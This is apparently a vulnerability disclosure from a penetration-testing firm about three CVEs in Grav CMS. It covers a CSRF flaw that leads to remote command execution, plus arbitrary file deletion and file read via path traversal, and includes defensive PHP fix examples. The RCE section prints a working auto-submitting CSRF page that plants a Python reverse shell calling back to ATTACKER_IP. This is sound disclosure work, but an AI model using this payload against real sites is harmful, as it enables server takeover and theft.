4 March 2021

[CVE-2020-29553] [CVE-2020-29555] [CVE-2020-29556]: Multiple vulnerabilities within CMS Grav

Introduction

Recently, BSSI performed a penetration test of the open-source Grav CMS. This very popular CMS has received numerous awards and has more than 12,500 stars on GitHub.

This article describes three vulnerabilities discovered by the BSSI audit team during that penetration test. They affect Grav CMS versions 1.6.28 and 1.7.0-rc.17, together with version 1.9.17 of the Admin plugin.

Grav's administration interface, provided by the Admin plugin, makes it simple to administer and configure a web site.

First vulnerability: Remote Command Execution (RCE) on the Grav CMS (CVE-2020-29553)

The first vulnerability stems from a flaw in the anti-CSRF token check of the administration interface. When the 'Scheduler' feature is enabled, an unauthenticated attacker who lures a logged-in administrator onto a malicious page can make the administrator's browser save a custom scheduled job, whose command is then executed on the server with the privileges of the web server user.

The video below describes the vulnerability (proof of concept):

[PoC video]

The exploit page used to obtain a reverse shell is shown below (replace ATTACKER_IP and ATTACKER_PORT with the listener's address; the job runs every minute once saved):

<form method="POST" name="f" action="http://victim.net/admin/tools/scheduler" 
target="hidden_iframe" style="display: none">
  <input name="task" value="save">
   <input name="data[status][cache-purge]" value="enabled">
   <input name="data[status][cache-clear]" value="enabled">
   <input name="data[status][default-site-backup]" value="enabled">
   <input name="data[custom_jobs][bssi][command]" value="python -c
'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect((&quot;ATTACKER_IP&quot;,ATTACKER_PORT));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);'">
   <input name="data[custom_jobs][bssi][args]" value="">
   <input name="data[custom_jobs][bssi][at]" value="* * * * *">
   <input name="data[custom_jobs][bssi][output]" value="logs/logs.txt">
   <input name="data[custom_jobs][bssi][output_mode]" value="overwrite">
   <input name="data[custom_jobs][bssi][email]" value="">
   <input type="submit">
</form>
<iframe name="hidden_iframe" style="display:none"></iframe>
<script type="text/javascript">
(function() {document.forms[0].submit()})();
</script>
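The server-side check that the page above relies on being absent, as an added illustration (this is not Grav's code): a per-session anti-CSRF token that is verified before the scheduler "save" task is dispatched. The field name csrf_token, the session array and the task handling are assumptions made for the demo, not Grav's implementation.

```php
<?php
// Added example, not Grav's code: a per-session anti-CSRF token enforced
// before a state-changing task is dispatched. The field name "csrf_token",
// the $session array and the task names are assumptions for the demo.
declare(strict_types=1);

/** Issue (once per session) the token that legitimate admin forms embed. */
function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Constant-time comparison of the submitted token with the session's. */
function verifyCsrf(array $session, ?string $submitted): bool
{
    $expected = $session['csrf_token'] ?? '';
    if ($expected === '' || $submitted === null) {
        return false;
    }
    return hash_equals($expected, $submitted);
}

/**
 * Scheduler "save" handler. The token is checked before the task is even
 * looked at, so a cross-site form (which cannot read the victim's session
 * and therefore cannot know the token) is refused whatever it carries in
 * data[custom_jobs]. A real handler would answer with HTTP 403 here.
 */
function handleSchedulerSave(array &$session, array $post): string
{
    if (!verifyCsrf($session, $post['csrf_token'] ?? null)) {
        return 'rejected: missing or invalid CSRF token';
    }
    if (($post['task'] ?? '') !== 'save') {
        return 'ignored: unknown task';
    }
    $jobs = $post['data']['custom_jobs'] ?? [];
    // ... only now persist $jobs to the scheduler configuration ...
    return 'saved ' . count($jobs) . ' custom job(s)';
}

// Demo: the victim's session, a cross-site POST built like the exploit
// form above (no token), and a legitimate POST from an admin form that
// embedded the session's token. Both payloads are constructed here.
$session = [];
$token   = csrfToken($session);

$crossSite = [
    'task' => 'save',
    'data' => ['custom_jobs' => ['bssi' => ['command' => 'id', 'at' => '* * * * *']]],
];
$legit = $crossSite + ['csrf_token' => $token];

echo handleSchedulerSave($session, $crossSite), PHP_EOL; // cross-site request
echo handleSchedulerSave($session, $legit), PHP_EOL;     // legitimate request
```

The token must be tied to the session and compared with hash_equals() so that it can be neither guessed nor timed; setting the session cookie with SameSite=Lax or Strict is a useful second layer, but it does not replace the token check.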

Second vulnerability: Arbitrary File Deletion (CVE-2020-29555)

The second vulnerability allows an unauthenticated attacker to delete any file in the CMS directory, and more generally any file the web server user has permission to remove. In particular, it allows an attacker to delete the administrator's YAML account file in order to then create a new administrator and take full control of the CMS.

The cause is that the taskBackupDelete() method, at line 1374 of user/plugins/admin/classes/AdminController.php, does not correctly validate the path of the file to delete, so it is possible to escape the backup directory with a directory traversal sequence.

Because the task itself requires an administrator session, the vulnerability is exploited through a CSRF attack: the administrator's browser is made to delete a chosen file when the administrator visits a malicious site.

The video below describes the vulnerability (proof of concept):

[PoC video]

Third vulnerability: Arbitrary File Read (CVE-2020-29556)

The last vulnerability allows an unauthenticated attacker to retrieve the content of any file on the server hosting Grav that the web server user can read.

The cause is that the taskBackup() method, at line 1317 of user/plugins/admin/classes/AdminController.php, does not correctly validate the path of the file to be backed up, so an arbitrary file can be specified with a directory traversal sequence.

This vulnerability is exploited through a CSRF attack chained with an XSS.

When the CMS administrator visits a malicious site, a first CSRF request stores malicious JavaScript in a page of the CMS; that script, executing in the administrator's browser within the CMS origin, then triggers the backup of the targeted file and retrieves the result, which a plain cross-site request could not read back.

The video below describes the vulnerability (proof of concept):

[PoC video]

Mitigation

The RCE (CVE-2020-29553) has been partially fixed by taking the CSRF token into account on the scheduler form.

The arbitrary file deletion (CVE-2020-29555) has been fixed by removing the strpos check and keeping only the basename of the $download variable, so the file is always looked up inside the backup directory.

The arbitrary file read (CVE-2020-29556) has been fixed in the same way, by keeping only the basename of the $backup variable.
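The two path checks described above, as an added illustration rather than Grav's own code: a prefix-only test of the kind an strpos() check gives, beside a basename()-based one. The function names, the parameter names and the temporary directory layout are assumptions made for the demo; the exact shape of the original strpos check is not reproduced from the project.

```php
<?php
// Added example, not Grav's code. The function names, the "name" parameter
// and the throw-away directory layout are assumptions for the demo.
declare(strict_types=1);

/**
 * BEFORE: only checks that the path starts with the backup directory.
 * "../user/accounts/admin.yaml" still resolves outside it, because the
 * traversal sits after the prefix being tested.
 */
function weakBackupPath(string $backupDir, string $name): ?string
{
    $path = $backupDir . '/' . $name;
    return strpos($path, $backupDir) === 0 ? $path : null;
}

/**
 * AFTER: keep only the last path component, so "../" and absolute paths
 * are discarded, then confirm that the resolved file really lives in the
 * backup directory (symlinks included) and is a regular file.
 */
function safeBackupPath(string $backupDir, string $name): ?string
{
    if (strpos($name, "\0") !== false) {
        return null;                       // realpath() rejects NUL bytes
    }
    $file = basename($name);
    if ($file === '' || $file === '.' || $file === '..') {
        return null;
    }
    $real    = realpath($backupDir . DIRECTORY_SEPARATOR . $file);
    $realDir = realpath($backupDir);
    if ($real === false || $realDir === false || !is_file($real)
        || strpos($real, $realDir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Demo on a constructed throw-away tree: backup/site.zip (a legitimate
// backup) and user/accounts/admin.yaml (the file an attacker would target).
$root = sys_get_temp_dir() . '/grav-path-demo-' . bin2hex(random_bytes(4));
mkdir("$root/backup", 0700, true);
mkdir("$root/user/accounts", 0700, true);
touch("$root/backup/site.zip");
touch("$root/user/accounts/admin.yaml");
$backupDir = "$root/backup";

foreach (['site.zip', '../user/accounts/admin.yaml'] as $name) {
    $weak = weakBackupPath($backupDir, $name) !== null ? 'accepted' : 'rejected';
    $safe = safeBackupPath($backupDir, $name) !== null ? 'accepted' : 'rejected';
    printf("%-30s strpos check: %-8s basename check: %s\n", $name, $weak, $safe);
}
```

basename() alone is what closes the traversal; the realpath() comparison is added as defence in depth for the case where the backup directory, or an entry inside it, is a symlink pointing elsewhere.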

Conclusion

Following the discovery of these vulnerabilities, the BSSI audit team reported the three issues to the Grav development team. A patch was made available on December 4, 2020 (Grav 1.6.30 and Admin 1.9.18). This patch fixes all three vulnerabilities.

These vulnerabilities are now known as CVE-2020-29553, CVE-2020-29555 and CVE-2020-29556.

Timeline

11/21/2020 – Discovery of the vulnerabilities
11/25/2020 – Contact with the Grav team
11/30/2020 – Follow-up with the Grav team
12/04/2020 – Vulnerabilities fixed in Grav 1.6.30 and Admin 1.9.18
03/04/2021 – Disclosure of the vulnerabilities
